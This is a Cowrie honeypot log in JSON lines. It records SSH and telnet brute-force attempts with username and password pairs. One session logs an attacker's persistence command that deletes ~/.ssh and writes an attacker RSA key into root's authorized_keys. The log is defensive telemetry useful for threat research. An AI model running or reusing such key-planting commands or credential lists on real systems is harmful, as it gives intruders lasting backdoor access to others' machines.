{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:33.012353Z","src_ip":"82.67.125.95","session":"59187df6ddef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41114,"dst_ip":"1.2.3.4","dst_port":22,"session":"254f6b82182d","protocol":"ssh","message":"New connection: 212.227.125.160:41114 (1.2.3.4:22) [session: 254f6b82182d]","sensor":"my-vps","timestamp":"2025-08-31T01:55:42.185040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:55:42.610746Z","src_ip":"212.227.125.160","session":"254f6b82182d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:55:42.652708Z","src_ip":"212.227.125.160","session":"254f6b82182d"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"password","message":"login attempt [dspace/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:55:45.081610Z","src_ip":"212.227.125.160","session":"254f6b82182d"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:46.730654Z","src_ip":"212.227.125.160","session":"254f6b82182d"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":47866,"dst_ip":"1.2.3.4","dst_port":23,"session":"bfdbfee4b364","protocol":"telnet","message":"New connection: 176.65.149.186:47866 (1.2.3.4:23) [session: bfdbfee4b364]","sensor":"my-vps","timestamp":"2025-08-31T01:56:17.015791Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:56:17.055857Z","src_ip":"176.65.149.186","session":"bfdbfee4b364"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:56:17.076836Z","src_ip":"176.65.149.186","session":"bfdbfee4b364"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-31T01:56:17.078094Z","src_ip":"176.65.149.186","session":"bfdbfee4b364"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-31T01:56:17.078997Z","src_ip":"176.65.149.186","session":"bfdbfee4b364"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60538,"dst_ip":"1.2.3.4","dst_port":22,"session":"24525c04fd27","protocol":"ssh","message":"New connection: 212.227.235.229:60538 (1.2.3.4:22) [session: 24525c04fd27]","sensor":"my-vps","timestamp":"2025-08-31T01:56:21.580152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:56:22.279472Z","src_ip":"212.227.235.229","session":"24525c04fd27"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:56:22.280592Z","src_ip":"212.227.235.229","session":"24525c04fd27"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"password1","message":"login attempt [dspace/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:28.324594Z","src_ip":"212.227.235.229","session":"24525c04fd27"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:30.342008Z","src_ip":"212.227.235.229","session":"24525c04fd27"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":54584,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8872d914c82","protocol":"ssh","message":"New connection: 82.67.125.95:54584 (1.2.3.4:22) [session: c8872d914c82]","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.248964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.249826Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.285692Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.login.success","username":"root","password":"Administrator_123","message":"login attempt [root/Administrator_123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.470112Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:56:31.559209Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.559949Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.560709Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:31.597451Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:56:32.185107Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.185948Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.223751Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.224914Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":54592,"dst_ip":"1.2.3.4","dst_port":22,"session":"88166c329cd1","protocol":"ssh","message":"New connection: 82.67.125.95:54592 (1.2.3.4:22) [session: 88166c329cd1]","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.253965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.254841Z","src_ip":"82.67.125.95","session":"88166c329cd1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.285808Z","src_ip":"82.67.125.95","session":"88166c329cd1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:32.449604Z","src_ip":"82.67.125.95","session":"88166c329cd1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.483155Z","src_ip":"82.67.125.95","session":"88166c329cd1"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":54596,"dst_ip":"1.2.3.4","dst_port":22,"session":"9de8af4c1e80","protocol":"ssh","message":"New connection: 82.67.125.95:54596 (1.2.3.4:22) [session: 9de8af4c1e80]","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.512907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.513875Z","src_ip":"82.67.125.95","session":"9de8af4c1e80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.544311Z","src_ip":"82.67.125.95","session":"9de8af4c1e80"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.708699Z","src_ip":"82.67.125.95","session":"9de8af4c1e80"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.741082Z","src_ip":"82.67.125.95","session":"c8872d914c82"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:33.742174Z","src_ip":"82.67.125.95","session":"9de8af4c1e80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51150,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f6de516a89c","protocol":"ssh","message":"New connection: 212.227.125.160:51150 (1.2.3.4:22) [session: 7f6de516a89c]","sensor":"my-vps","timestamp":"2025-08-31T01:56:43.778995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:56:44.304339Z","src_ip":"212.227.125.160","session":"7f6de516a89c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:56:44.336609Z","src_ip":"212.227.125.160","session":"7f6de516a89c"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"password1","message":"login attempt [dspace/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:46.631459Z","src_ip":"212.227.125.160","session":"7f6de516a89c"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:56:48.270556Z","src_ip":"212.227.125.160","session":"7f6de516a89c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10750,"dst_ip":"1.2.3.4","dst_port":22,"session":"3367a53f41a9","protocol":"ssh","message":"New connection: 212.227.235.229:10750 (1.2.3.4:22) [session: 3367a53f41a9]","sensor":"my-vps","timestamp":"2025-08-31T01:56:54.289260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:56:54.290316Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:56:54.397555Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"02111988","message":"login attempt [admin/02111988] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:54.908560Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"02101991","message":"login attempt [admin/02101991] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:56.018272Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01121978","message":"login attempt [admin/01121978] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:57.127810Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01071994","message":"login attempt [admin/01071994] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:58.238524Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021982","message":"login attempt [admin/01021982] failed","sensor":"my-vps","timestamp":"2025-08-31T01:56:59.348760Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:57:00.457991Z","src_ip":"212.227.235.229","session":"3367a53f41a9"}
{"eventid":"cowrie.session.connect","src_ip":"220.80.101.41","src_port":57325,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8dfbe55aef8","protocol":"telnet","message":"New connection: 220.80.101.41:57325 (1.2.3.4:23) [session: d8dfbe55aef8]","sensor":"my-vps","timestamp":"2025-08-31T01:57:06.510100Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42294,"dst_ip":"1.2.3.4","dst_port":22,"session":"beff0a21dc93","protocol":"ssh","message":"New connection: 212.227.235.229:42294 (1.2.3.4:22) [session: beff0a21dc93]","sensor":"my-vps","timestamp":"2025-08-31T01:57:23.855805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:57:24.978010Z","src_ip":"212.227.235.229","session":"beff0a21dc93"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 